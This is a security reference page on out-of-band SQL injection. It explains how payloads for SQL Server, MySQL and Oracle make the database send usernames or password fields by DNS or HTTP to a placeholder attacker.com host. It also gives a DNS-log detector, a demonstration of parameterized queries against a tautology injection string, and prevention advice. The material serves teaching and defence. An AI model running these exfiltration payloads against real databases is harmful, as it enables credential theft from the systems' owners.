Out-of-Band SQL Injection

Out-of-Band SQL Injection (OOB SQLi) is a technique used when an attacker cannot receive results through the normal response channel. Instead, data is exfiltrated through alternative channels such as DNS lookups or HTTP requests to attacker-controlled servers.

How It Works

The attacker crafts SQL that makes the database server itself open an outbound connection, typically a DNS lookup, a UNC (SMB) path access, or an HTTP request. The data to exfiltrate is encoded into the hostname being resolved or into the request path, so it arrives at the attacker's server even though the application returns nothing.

Example

DNS exfiltration (SQL Server):

-- Exfiltrate the current database username via a DNS lookup
DECLARE @data VARCHAR(100);
SELECT @data = user_name();
-- xp_dirtree tries to list a UNC path, which forces a name resolution
EXEC('master..xp_dirtree "\\' + @data + '.attacker.com\x"');

-- Attacker receives a DNS query for:
-- dbo.attacker.com

DNS exfiltration via a UNC path (MySQL running on Windows, with LOAD_FILE):

-- Reading a UNC path makes the server resolve the embedded hostname
SELECT LOAD_FILE(CONCAT('\\\\',
  (SELECT password FROM users LIMIT 1),
  '.attacker.com\\a'));

Oracle UTL_HTTP:

SELECT UTL_HTTP.REQUEST('http://attacker.com/'||
  (SELECT password FROM users WHERE rownum=1))
FROM dual;
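Every one of the lookups above leaves a trace on the organisation's resolver, and that is where a defender can see them. The following is an added example, not part of the original page: a small detector that parses constructed resolver log lines (timestamp, client IP, query name, query type) and flags lookups from database hosts for names outside an allowlisted set of zones, adding further reasons when the leftmost label is long or has high entropy, as encoded data tends to. The database host addresses, allowed zones, thresholds and log lines are all assumptions made for the example.

```python
"""Flag DNS lookups that look like out-of-band exfiltration from database hosts.

Added example (not part of the original page). Assumes a resolver log with
space-separated fields: timestamp, client IP, query name, query type. The
host set, allowlist, thresholds and log lines below are constructed.
"""
import math
import re
from collections import Counter

# Constructed: addresses of database servers, which should rarely resolve
# names outside the organisation's own zones.
DB_SERVER_IPS = {"10.0.5.20", "10.0.5.21"}

# Constructed: zones a database host may legitimately resolve.
ALLOWED_ZONES = ("corp.example.", "example.internal.")

# Constructed resolver log lines: "<ts> <client> <qname> <qtype>".
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.5.20 ldap01.corp.example. A
2024-05-01T10:00:02Z 10.0.7.33 www.vendor.example. A
2024-05-01T10:00:03Z 10.0.5.20 dbo.attacker.com. A
2024-05-01T10:00:04Z 10.0.5.21 5f4dcc3b5aa765d61d8327deb882cf99.attacker.com. A
2024-05-01T10:00:05Z 10.0.5.21 backup.example.internal. A
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")

# Illustrative thresholds: hex/base32 blobs are long and score close to
# 4 bits per character, ordinary hostname labels are short and score lower.
LONG_LABEL = 24
HIGH_ENTROPY = 3.5


def shannon_entropy(s):
    """Bits per character of the string; 0.0 for the empty string."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_line(line):
    """Split one log line into a record, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, qname, qtype = m.groups()
    return {"ts": ts, "client": client, "qname": qname.lower(), "qtype": qtype}


def is_allowed_zone(qname):
    return any(qname.endswith(z) for z in ALLOWED_ZONES)


def classify(record):
    """Return the list of reasons a record is suspicious (empty means benign)."""
    reasons = []
    if record["client"] not in DB_SERVER_IPS:
        return reasons  # only database hosts are in scope for this rule
    if is_allowed_zone(record["qname"]):
        return reasons
    reasons.append("db-host-external-lookup")
    leftmost = record["qname"].split(".")[0]
    if len(leftmost) >= LONG_LABEL:
        reasons.append("long-label")
    if shannon_entropy(leftmost) >= HIGH_ENTROPY:
        reasons.append("high-entropy-label")
    return reasons


def scan(log_text):
    """Return (record, reasons) for every suspicious line in the log text."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            findings.append((rec, reasons))
    return findings


if __name__ == "__main__":
    for rec, reasons in scan(SAMPLE_LOG):
        print(rec["ts"], rec["client"], rec["qname"], ",".join(reasons))
```

On the constructed log this reports two lines: the `dbo.attacker.com.` lookup is flagged only because a database host resolved an external name, while the 32-character hex label is additionally flagged as long and high-entropy. The first reason alone is the useful one in practice: a database server has very few legitimate reasons to resolve names outside its own zones, so the allowlist carries the rule and the label heuristics only add confidence.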

When to Use OOB

  • The query produces no visible output at all (true blind injection)
  • Time-based inference is too slow or is blocked
  • The firewall blocks the response channel but allows outbound DNS or HTTP from the database host
  • The query runs asynchronously, so its result never reaches the application's response

Prevention

  • Use parameterized queries so user input is bound as data and never parsed as SQL
  • Restrict outbound network access from database hosts (DNS, SMB and HTTP egress)
  • Disable or restrict the functions that make network requests (xp_dirtree, UTL_HTTP)
  • Monitor DNS and outbound HTTP from database hosts for unusual lookups (unknown domains, long or encoded labels)
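The first bullet is the one that removes the vulnerability rather than containing it. As an added example (not from the original page), the script below uses Python's built-in sqlite3 to put a concatenated query next to a parameterized one and run the same input through both; the table, its rows and the input string are constructed for the demonstration. The behaviour is the same with the SQL Server, MySQL and Oracle drivers: a bound parameter is sent as a value, so it can never close a string literal and append an `EXEC` or a sub-select.

```python
"""Concatenated SQL versus a parameterized query.

Added example (not from the original page). Uses the standard-library sqlite3
module so it runs offline; the table, rows and input are constructed.
"""
import sqlite3


def make_db():
    """Create an in-memory database with a small constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (name, email) VALUES (?, ?)",
        [("alice", "alice@example.internal"), ("bob", "bob@example.internal")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, name):
    """Builds the statement by concatenation: the input is parsed as SQL text."""
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, name):
    """Binds the input as a parameter: the input is compared as a literal value."""
    return conn.execute(
        "SELECT name, email FROM users WHERE name = ?", (name,)
    ).fetchall()


# Constructed input that closes the string literal and rewrites the WHERE
# clause when concatenated. When bound, it is simply a name nobody has.
TAUTOLOGY_INPUT = "x' OR '1'='1"


def demo():
    """Run the same inputs through both lookups and return the results."""
    conn = make_db()
    return {
        "vulnerable": lookup_vulnerable(conn, TAUTOLOGY_INPUT),
        "parameterized": lookup_parameterized(conn, TAUTOLOGY_INPUT),
        "legit": lookup_parameterized(conn, "alice"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:14s} {rows}")
```

The concatenated lookup returns every row because the input turned the filter into a tautology; the parameterized lookup returns nothing for the same input and still finds `alice` when asked for `alice`. The OOB payloads on this page depend on exactly the first behaviour, which is why parameterization is listed before the network controls.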

See Also